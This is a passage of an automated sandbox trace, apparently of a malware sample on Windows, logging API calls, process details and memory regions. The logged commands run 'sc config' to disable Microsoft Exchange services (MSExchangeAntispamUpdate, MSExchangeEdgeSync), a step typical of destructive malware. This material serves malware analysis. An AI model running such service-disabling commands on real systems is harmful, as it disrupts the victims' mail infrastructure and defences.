returned 3 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0129.545] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.546] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeAntispamUpdate start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4a0f6a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeAntispamUpdate start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4a0f6ec | out: lpCommandLine="sc config MSExchangeAntispamUpdate start= disabled", lpProcessInformation=0x4a0f6ec*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf4c, dwThreadId=0xf44)) returned 1 [0129.553] CloseHandle (hObject=0xa4) returned 1 [0129.553] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.553] GetEnvironmentStringsW () returned 0x4a69f18* [0129.553] FreeEnvironmentStringsA (penv="=") returned 1 [0129.553] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0129.599] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4a0f684 | out: lpExitCode=0x4a0f684*=0x424) returned 1 [0129.600] CloseHandle (hObject=0xa8) returned 1 [0129.600] _vsnwprintf (in: _Buffer=0x4a0f76c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4a0f68c | out: _Buffer="00000424") returned 8 [0129.600] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0129.600] GetEnvironmentStringsW () returned 0x4a6b428* [0129.600] FreeEnvironmentStringsA (penv="=") returned 1 [0129.600] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.600] GetEnvironmentStringsW () returned 0x4a6b428* [0129.600] FreeEnvironmentStringsA (penv="=") returned 1 [0129.600] DeleteProcThreadAttributeList (in: lpAttributeList=0x4a0f718 | out: lpAttributeList=0x4a0f718) [0129.600] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.600] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.600] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.600] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.600] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.600] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.601] SetConsoleInputExeNameW () returned 0x1 [0129.601] GetConsoleOutputCP () returned 0x1b5 [0129.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.601] exit (_Code=1060) Thread: id = 436 os_tid = 0xf50 Process: id = "120" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x268c0000" os_pid = "0xeec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "119" os_parent_pid = "0xef0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6843 start_va = 0x7fd18000 end_va = 0x7fd18fff entry_point = 0x0 region_type = private name = "private_0x000000007fd18000" filename = "" Region: id = 6844 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6845 start_va = 0x2e06b50000 end_va = 0x2e06b6ffff entry_point = 0x0 region_type = private name = "private_0x0000002e06b50000" filename = "" Region: id = 6846 start_va = 0x2e06b70000 end_va = 0x2e06b83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002e06b70000" filename = "" Region: id = 6847 start_va = 0x2e06b90000 end_va = 0x2e06bcffff entry_point = 0x0 region_type = private name = "private_0x0000002e06b90000" filename = "" Region: id = 6848 start_va = 0x7df5ffc70000 end_va = 0x7ff5ffc6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc70000" filename = "" Region: id = 6849 start_va = 0x7ff6c4390000 end_va = 0x7ff6c43b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4390000" filename = "" Region: id = 6850 start_va = 0x7ff6c43b4000 end_va = 0x7ff6c43b4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43b4000" filename = "" Region: id = 6851 start_va = 0x7ff6c43be000 end_va = 0x7ff6c43bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43be000" filename = "" Region: id = 6852 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6853 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6854 start_va = 0x2e06b50000 end_va = 0x2e06b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002e06b50000" filename = "" Region: id = 6855 start_va = 0x2e06b60000 end_va = 0x2e06b66fff entry_point = 0x0 region_type = private name = "private_0x0000002e06b60000" filename = "" Region: id = 6856 start_va = 0x2e06bd0000 end_va = 0x2e06c0ffff entry_point = 0x0 region_type = private name = "private_0x0000002e06bd0000" filename = "" Region: id = 6857 start_va = 0x2e06c10000 end_va = 0x2e06c10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002e06c10000" filename = "" Region: id = 6858 start_va = 0x2e06c20000 end_va = 0x2e06c26fff entry_point = 0x0 region_type = private name = "private_0x0000002e06c20000" filename = "" Region: id = 6859 start_va = 0x2e06c30000 end_va = 0x2e06d2ffff entry_point = 0x0 region_type = private name = "private_0x0000002e06c30000" filename = "" Region: id = 6860 start_va = 0x2e06d30000 end_va = 0x2e06dedfff entry_point = 0x2e06d30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6861 start_va = 0x2e06df0000 end_va = 0x2e06df0fff entry_point = 0x0 region_type = private name = "private_0x0000002e06df0000" filename = "" Region: id = 6862 start_va = 0x2e06e00000 end_va = 0x2e06e00fff entry_point = 0x0 region_type = private name = "private_0x0000002e06e00000" filename = "" Region: id = 6863 start_va = 0x2e06e10000 end_va = 0x2e06e1ffff entry_point = 0x0 region_type = private name = "private_0x0000002e06e10000" filename = "" Region: id = 6864 start_va = 0x2e06e20000 end_va = 0x2e06fa7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002e06e20000" filename = "" Region: id = 6865 start_va = 0x2e06fb0000 end_va = 0x2e07130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002e06fb0000" filename = "" Region: id = 6866 start_va = 0x2e07140000 end_va = 0x2e0853ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002e07140000" filename = "" Region: id = 6867 start_va = 0x7ff6c4290000 end_va = 0x7ff6c438ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4290000" filename = "" Region: id = 6868 start_va = 0x7ff6c43bc000 end_va = 0x7ff6c43bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43bc000" filename = "" Region: id = 6869 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6870 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6871 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6872 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6873 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6874 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6875 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6876 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6877 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6878 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6879 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6880 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6881 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6882 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 433 os_tid = 0xefc Thread: id = 434 os_tid = 0xef4 Thread: id = 435 os_tid = 0xf2c Process: id = "121" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x26d0e000" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "119" os_parent_pid = "0xef0" cmd_line = "sc config MSExchangeAntispamUpdate start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6896 start_va = 0x990000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 6897 start_va = 0x9b0000 end_va = 0x9b1fff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 6898 start_va = 0x9c0000 end_va = 0x9d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 6899 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 6900 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 6901 start_va = 0xa60000 end_va = 0xa63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 6902 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 6903 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6904 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 6905 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 6906 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6907 start_va = 0x7e6c0000 end_va = 0x7e6e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6c0000" filename = "" Region: id = 6908 start_va = 0x7e6e9000 end_va = 0x7e6ebfff entry_point = 0x0 region_type = private name = "private_0x000000007e6e9000" filename = "" Region: id = 6909 start_va = 0x7e6ec000 end_va = 0x7e6ecfff entry_point = 0x0 region_type = private name = "private_0x000000007e6ec000" filename = "" Region: id = 6910 start_va = 0x7e6ef000 end_va = 0x7e6effff entry_point = 0x0 region_type = private name = "private_0x000000007e6ef000" filename = "" Region: id = 6911 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6912 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6913 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6914 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6915 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6916 start_va = 0xc10000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 6917 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6918 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6919 start_va = 0xd70000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 6920 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6921 start_va = 0x990000 end_va = 0x99ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 6922 start_va = 0x9a0000 end_va = 0x9a3fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 6923 start_va = 0xa90000 end_va = 0xb4dfff entry_point = 0xa90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6924 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 6925 start_va = 0xb90000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 6926 start_va = 0x5050000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 6927 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6928 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6929 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6930 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6931 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6932 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6933 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6934 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6935 start_va = 0x7e5c0000 end_va = 0x7e6bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5c0000" filename = "" Region: id = 6936 start_va = 0x7e6e6000 end_va = 0x7e6e8fff entry_point = 0x0 region_type = private name = "private_0x000000007e6e6000" filename = "" Region: id = 6937 start_va = 0xc20000 end_va = 0xcfefff entry_point = 0xc20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 6938 start_va = 0xbd0000 end_va = 0xbe1fff entry_point = 0xbd0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 437 os_tid = 0xf44 [0129.588] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0129.588] __set_app_type (_Type=0x1) [0129.588] __p__fmode () returned 0x77ac4d6c [0129.588] __p__commode () returned 0x77ac5b1c [0129.588] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0129.588] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0129.588] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.591] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0129.591] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0129.591] _wcsicmp (_String1="config", _String2="query") returned -14 [0129.591] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0129.591] _wcsicmp (_String1="config", _String2="start") returned -16 [0129.591] _wcsicmp (_String1="config", _String2="pause") returned -13 [0129.591] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0129.591] _wcsicmp (_String1="config", _String2="control") returned -14 [0129.591] _wcsicmp (_String1="config", _String2="continue") returned -14 [0129.591] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.591] _wcsicmp (_String1="config", _String2="config") returned 0 [0129.591] ResolveDelayLoadedAPI () returned 0x77262c10 [0129.591] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd78570 [0129.593] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0129.593] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0129.593] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0129.593] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0129.593] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0129.593] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0129.593] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0129.593] OpenServiceW (hSCManager=0xd78570, lpServiceName="MSExchangeAntispamUpdate", dwDesiredAccess=0x3) returned 0x0 [0129.593] GetLastError () returned 0x424 [0129.593] _ultow (in: _Dest=0x424, _Radix=10876444 | out: _Dest=0x424) returned="1060" [0129.593] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0129.594] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xa5f5f8, nSize=0x2, Arguments=0xa5f610 | out: lpBuffer="褀×¥蔔è") returned 0x62 [0129.595] GetFileType (hFile=0x3c) returned 0x2 [0129.595] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa5f5dc | out: lpMode=0xa5f5dc) returned 1 [0129.595] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd78900*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xa5f5ec, lpReserved=0x0 | out: lpBuffer=0xd78900*, lpNumberOfCharsWritten=0xa5f5ec*=0x62) returned 1 [0129.596] LocalFree (hMem=0xd78900) returned 0x0 [0129.596] LocalFree (hMem=0x0) returned 0x0 [0129.596] CloseServiceHandle (hSCObject=0xd78570) returned 1 [0129.596] LocalFree (hMem=0x0) returned 0x0 [0129.596] exit (_Code=1060) Thread: id = 438 os_tid = 0xf40 Process: id = "122" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x26afd000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeEdgeSync start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6939 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6940 start_va = 0x920000 end_va = 0x491ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 6941 start_va = 0x4920000 end_va = 0x493ffff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 6942 start_va = 0x4940000 